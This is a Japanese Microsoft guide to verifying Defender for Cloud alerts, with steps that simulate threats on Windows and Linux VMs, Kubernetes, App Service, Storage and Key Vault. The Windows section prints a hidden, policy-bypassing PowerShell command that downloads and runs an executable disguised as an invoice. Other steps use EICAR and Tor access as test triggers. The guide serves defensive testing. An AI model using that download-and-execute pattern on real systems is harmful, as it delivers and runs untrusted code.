Microsoft Defender for Cloud でのアラートの検証

  • [アーティクル]

このドキュメントでは、Microsoft Defender for Cloud アラート用にシステムが正しく構成されていることを確認する方法について説明します。

セキュリティの警告とは何か

アラートは、リソースに対する脅威を検出するときに Defender for Cloud によって生成される通知です。 アラートは優先順位を付けられ、問題の迅速な調査に必要な情報と共に一覧表示されます。 Defender for Cloud には、攻撃を修復する方法に関する推奨事項も用意されています。

詳細については、Defender for Cloud のセキュリティ アラートおよびセキュリティ アラートの管理と対応に関するページを参照してください。

前提条件

すべてのアラートを受信するには、マシンと接続された Log Analytics ワークスペースが同じテナントに存在する必要があります。

サンプル セキュリティ アラートを生成する

Microsoft Defender for Cloud でセキュリティ アラートの管理と対応を行う」で説明されている新しいプレビュー アラート エクスペリエンスを使用する場合、Azure portal のセキュリティ アラート ページからサンプル アラートを作成できます。

アラートのサンプルを使用して次の作業を行います。

  • Microsoft Defender プランの価値と機能を評価する。
  • セキュリティ アラートに対して行った構成 (SIEM 統合、ワークフローの自動化、電子メール通知など) を検証する。

アラートのサンプルを作成するには:

  1. サブスクリプション共同作成者ロールを持つユーザーとして、セキュリティ アラート ページのツール バーから [Sample alerts] (サンプル アラート) を選びます。

  2. サブスクリプションを選択します。

  3. アラートを表示する関連する Microsoft Defender プランを選択します。

  4. [アラートのサンプルの作成] を選択します。

    Microsoft Defender for Cloud でサンプル アラートを作成する手順を示すスクリーンショット。

    アラート のサンプルが作成されていることを知らせる通知が表示されます。

    アラートのサンプルが生成されていることを示す通知を示すスクリーンショット。

    数分後に、[セキュリティ アラート] ページにアラートが表示されます。 また、Microsoft Defender for Cloud セキュリティ アラート (接続された SIEM、電子メール通知など) を受信するように構成した他の場所にも表示されます。

    セキュリティ アラートの一覧でのアラートのサンプルを示すスクリーンショット。

    ヒント

    このアラートは、シミュレートされたリソースを対象とします。

Azure VM でアラートをシミュレートする (Windows)

Microsoft Defender for Endpoint エージェントがコンピューターにインストールされたら、Defender for Servers の統合の一環として、アラートの攻撃対象リソースにするコンピューターから次の手順に従います。

  1. デバイスで管理者特権のコマンド ライン プロンプトを開き、次のスクリプトを実行します。

    1. [スタート] に移動し、「cmd」と入力します。

    2. [コマンド プロンプト] を右クリック選択し、[管理者として実行] を選択します

    [管理者として実行] を選択する場所を示すスクリーンショット。

  2. 次のコマンドをコピーし、プロンプトで実行します。powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'

  3. コマンド プロンプト ウィンドウは自動的に閉じます。 成功すると、10 分後に [Defender for Cloud Alerts] (Defender for Cloud アラート) ブレードに新しいアラートが表示されます。

  4. PowerShell ボックスのメッセージ行が、ここに示すものと同様に表示されます。

    PowerShell メッセージ行を示すスクリーンショット。

または、EICAR テスト文字列を使用してこのテストを実行することもできます。テキスト ファイルを作成し、EICAR 行を貼り付け、ファイルを実行可能ファイルとしてコンピューターのローカル ドライブに保存します。

Note

Windows のテスト アラートを確認するときは、Defender for Endpoint がリアルタイム保護を有効にして実行されていることを確認します。 この構成を検証する方法を確認します。

Azure VM でアラートをシミュレートする (Linux)

Microsoft Defender for Endpoint エージェントがコンピューターにインストールされたら、Defender for Servers の統合の一環として、アラートの攻撃対象リソースにするコンピューターから次の手順に従います。

  1. ターミナル ウィンドウを開き、次のコマンドをコピーして実行します。curl -O https://secure.eicar.org/eicar.com.txt

  2. コマンド プロンプト ウィンドウは自動的に閉じます。 成功すると、10 分後に [Defender for Cloud Alerts] (Defender for Cloud アラート) ブレードに新しいアラートが表示されます。

Note

Linux のテスト アラートを確認するときは、Defender for Endpoint がリアルタイム保護を有効にして実行されていることを確認します。 この構成を検証する方法を確認します。

Kubernetes でアラートをシミュレートする

Defender for Containers は、クラスターと基になるクラスター ノードの両方についてセキュリティ アラートを提供します。 Defender for Containers は、コントロール プレーン (API サーバー) とコンテナー化されたワークロードの両方を監視することで、これを実現します。

アラートのプレフィックスに基づいて、そのアラートがコントロール プランに関連しているか、またはコンテナー化されたワークロードに関連しているかを識別できます。 コントロール プレーンのセキュリティ アラートには K8S_ というプレフィックスが付加され、一方、クラスター内のランタイム ワークロードのセキュリティ アラートには K8S.NODE_ というプレフィックスが付加されます。

次の手順を使用すると、コントロール プレーンとワークロードの両方のアラートをシミュレートできます。

コントロール プレーンのアラート (K8S_ プレフィックス) をシミュレートする

必要条件

  • Defender for Containers プランが有効になっていることを確認します。
  • Arc のみ - Defender エージェントがインストールされていることを確認します。
  • EKS または GKE のみ - 既定の監査ログ収集の自動プロビジョニング オプションが有効になっていることを確認します。

Kubernetes コントロール プレーンのセキュリティ アラートをシミュレートするには:

  1. クラスターから次のコマンドを実行します。

    kubectl get pods --namespace=asc-alerttest-662jfi039n

    次の応答が返されます: No resource found

  2. 30 分間待ちます。

  3. Azure portal で、Defender for Cloud のセキュリティ アラート ページに移動します。

  4. 関連する Kubernetes クラスターで、Microsoft Defender for Cloud test alert for K8S (not a threat) というアラートを見つけます

ワークロードのアラート (K8S.NODE_ プレフィックス) をシミュレートする

必要条件

  • Defender for Containers プランが有効になっていることを確認します。
  • Defender センサーがインストールされていることを確認します。

Kubernetes ワークロードのセキュリティ アラートをシミュレートするには、次の手順を実行します

  1. テスト コマンドを実行するポッドを作成します。 このポッドは、クラスター内の既存のポッドのいずれか、または新しいポッドにすることができます。 このサンプル yaml 構成を使って作成できます。

    apiVersion: v1
kind: Pod
metadata:
    name: mdc-test
spec:
    containers:
        - name: mdc-test
          image: ubuntu:18.04
          command: ["/bin/sh"]
          args: ["-c", "while true; do echo sleeping; sleep 3600;done"]

    ポッドを作成するには、以下を実行します。

    kubectl apply -f <path_to_the_yaml_file>

  2. クラスターから次のコマンドを実行します。

    kubectl exec -it mdc-test -- bash

  3. 実行可能ファイルを別の場所にコピーし、コマンド cp /bin/echo ./asc_alerttest_662jfi039n を使って ./asc_alerttest_662jfi039n に名前を変更します。

  4. ファイル ./asc_alerttest_662jfi039n testing eicar pipe を実行します。

  5. 10 分間待ちます。

  6. Azure portal で、Defender for Cloud のセキュリティ アラート ページに移動します。

  7. 関連する AKS クラスターで、Microsoft Defender for Cloud test alert (not a threat) というアラートを見つけます。

Microsoft Defender for Containers」でも、Kubernetes ノードとクラスターの保護について詳しく学習できます。

App Service のアラートをシミュレートする

App Service で実行されているリソースのアラートをシミュレートできます。

  1. 新しい Web サイトを作成し、Defender for Cloud に登録されるまで 24 時間待つか、既存の Web サイトを使用します。

  2. Web サイトが作成されたら、次の URL を使用して Web サイトにアクセスします。

    1. App Service リソース ペインを開き、既定のドメイン フィールドから URL のドメインをコピーします。

      既定のドメインをコピーする場所を示すスクリーンショット。

    2. Web サイト名を URL にコピーします。https://<website name>.azurewebsites.net/This_Will_Generate_ASC_Alert

  3. アラートは約 1 ~ 2 時間以内に生成されます。

Storage ATP のアラートをシミュレートする (脅威に対する高度な保護)

  1. Azure Defender for Storage が有効になっているストレージ アカウントに移動します。

  2. サイド バーで [コンテナー] タブを選びます。

    コンテナーを選ぶために移動する場所を示すスクリーンショット。

  3. 既存のコンテナーに移動するか、新しく作成します。

  4. ファイルをそのコンテナーにアップロードします。 機密データが含まれる可能性のあるファイルはアップロードしないでください。

    コンテナーにファイルをアップロードする場所を示すスクリーンショット。

  5. アップロードしたファイルを右クリックし、[SAS の生成] を選びます。

  6. [SAS トークンおよび URL を生成] ボタンを選択します (オプションを変更する必要はありません)。

  7. 生成された SAS URL をコピーします。

  8. Tor Browser を起動します。Tor Browser はこちらでダウンロードできます。

  9. Tor ブラウザーで SAS URL に移動します。 これで、アップロードしたファイルが表示され、ダウンロードできるようになります。

AppServices アラートのテスト

アプリ サービス EICAR アラートをシミュレートするには:

  1. App Services Web サイトの [Azure portal] ブレードに移動するか、この Web サイトに関連付けられているカスタム DNS エントリを使用して、Web サイトの HTTP エンドポイントを見つけます。 (Azure App Services Web サイトの既定の URL エンドポイントには サフィックス https://XXXXXXX.azurewebsites.net が付きます)。 この Web サイトは、アラート シミュレーションの前に作成された Web サイトではなく、既存のものである必要があります。
  2. Web サイトの URL を参照し、固定サフィックス /This_Will_Generate_ASC_Alert を追加します。 URL は次のようになります: https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert。 アラートが生成されるまでに時間がかかる場合があります (最大 1.5 時間)。

Azure Key Vault 脅威検出を検証する

  1. キー コンテナーをまだ作成していない場合は、必ず作成してください。
  2. キー コンテナーとシークレットの作成が完了したら、インターネットにアクセスできる VM に移動し、TOR Browser をダウンロードします。
  3. TOR Browser を VM にインストールします。
  4. インストールが完了したら、常用のブラウザーを開き、Azure portal にサインインして、キー コンテナーのページにアクセスします。 強調表示されている URL を選択し、アドレスをコピーします。
  5. TOR を開き、この URL を貼り付けます (Azure portal にアクセスするには、もう一度認証する必要があります)。
  6. アクセスが完了したら、左側のペインで [シークレット] オプションを選ぶこともできます。
  7. TOR Browser で、Azure portal からサインアウトし、ブラウザーを閉じます。
  8. しばらくすると、Defender for Key Vault によって、この疑わしいアクティビティに関する詳細情報を含むアラートがトリガーされます。

次のステップ

この記事では、アラートの検証プロセスについて説明しました。 この検証について理解できたら、次の記事を確認してください。